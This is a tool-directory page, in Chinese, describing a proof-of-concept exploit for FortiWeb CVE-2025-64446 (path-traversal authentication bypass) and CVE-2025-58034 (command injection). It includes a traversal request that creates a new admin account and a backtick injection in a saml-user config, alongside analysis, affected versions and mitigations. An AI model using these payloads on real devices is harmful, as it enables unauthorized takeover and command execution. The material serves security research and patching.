Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Vulnerability-CVE-2025-64446-CVE-2025-58034 — 针对 FortiWeb 的 CVE-2025-64446(通过路径遍历绕过身份验证)和 CVE-2025-58034(操作系统命令注入)的 PoC 漏洞利用代码,附带详细分析和缓解指南。 | Kitploit
工具/GitHubGitHub/litndat/vulnerability-cve-2025-64446-cve-2025-58034
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用学习与教育实验室与实践
GitHublitndat/vulnerability-cve-2025-64446-cve-2025-58034

Vulnerability-CVE-2025-64446-CVE-2025-58034

针对 FortiWeb 的 CVE-2025-64446(通过路径遍历绕过身份验证)和 CVE-2025-58034(操作系统命令注入)的 PoC 漏洞利用代码,附带详细分析和缓解指南。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
22个月前尚未审核

模拟利用 FortiWeb (CVE-2025-64446 & CVE-2025-58034)

注意:

  • 本文档仅供学习和安全研究目的。
  • 未经授权,不得用于攻击系统。

1. 概述

FortiWeb 是用于保护 Web 应用程序的 Web 应用防火墙 (WAF) 设备。

2025 年,发现两个严重漏洞:

  • CVE-2025-64446 – 通过路径遍历绕过认证
  • CVE-2025-58034 – 操作系统命令注入

2. CVE-2025-64446 概述

项目内容
漏洞类型Relative Path Traversal
Authentication Bypass
原因FortiWeb 在认证前对路径处理不严格:

- 基于逻辑路径字符串的访问控制
- 未完全规范化路径
- 允许使用 ../ 访问内部资源
描述某些管理端点可以在未经有效认证的情况下被访问
危害- 完全绕过认证
- 非法访问管理员功能
- 破坏权限模型
受影响版本- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.4
- 7.4.0 – 7.4.9
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11

示例:

root@kitploit:~
/api/v2.0/cmdb/system/../../../../../../cgi-bin/fwbcgi

3. CVE-2025-58034 概述


4. 实验过程 (POC)

4.1. 环境准备:

root@kitploit:~
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt

这有助于避免库版本冲突,确保工作环境的稳定性,并减少对系统的影响。

image

4.2 利用

Payload

root@kitploit:~
 cgiinfo_json = {
        "username": "admin",
        "profname": "prof_admin",
        "vdom": "root",
        "loginname": "admin"
    }
cgiinfo_b64 = base64.b64encode(json.dumps(cgiinfo_json).encode()).decode()
conn.request("POST", "/api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi", body=body_data, headers=headers)
        resp = conn.getresponse()
result = {
            'target': f"{host}:{port}",
            'status': resp.status,
            'user': username,
            'password': password,
            'success': resp.status == 200
        }

使用 Python3 运行工具:

root@kitploit:~
python3 exploit.py <IP_target>
  • <IP_target>: 此 IP 地址是 FortiWeb 设备的主机名。
image

获取到用户名和密码 -> 进行登录

image image

利用成功并创建了具有管理员权限的新账户。

4.3 登录后利用 CVE-2025-58034

成功使用新创建的管理员账户登录后,攻击者可以通过精心构造的请求或直接通过 FortiWeb CLI 命令行界面利用经过身份验证的命令注入漏洞:

root@kitploit:~
config user saml-user

edit "`id`" ## nhập lệnh tại đây

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

FortiWeb 将退出配置字符串并在配置 saml-user 过程中执行 id 命令。

5. 一些缓解措施

  • 将 FortiWeb 更新到已修补的版本。
  • 限制对管理界面的访问。
  • 不要将管理接口暴露到互联网。
  • 检查异常的管理员账户。

6. 更多参考资料

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
下载工具
项目内容
漏洞类型OS Command Injection (CWE-78)
原因FortiWeb 在执行操作系统命令时对输入处理不安全:

- 未验证输入
- 缺少特殊字符转义
- 直接将用户数据传递给系统命令
描述该漏洞需要认证,但允许注入系统命令
危害- 执行意外命令
- 访问系统资源
- 影响完整性和可用性
受影响版本- 8.0.0 – 8.0.1
- 7.6.0 – 7.6.5
- 7.4.0 – 7.4.10
- 7.2.0 – 7.2.11
- 7.0.0 – 7.0.11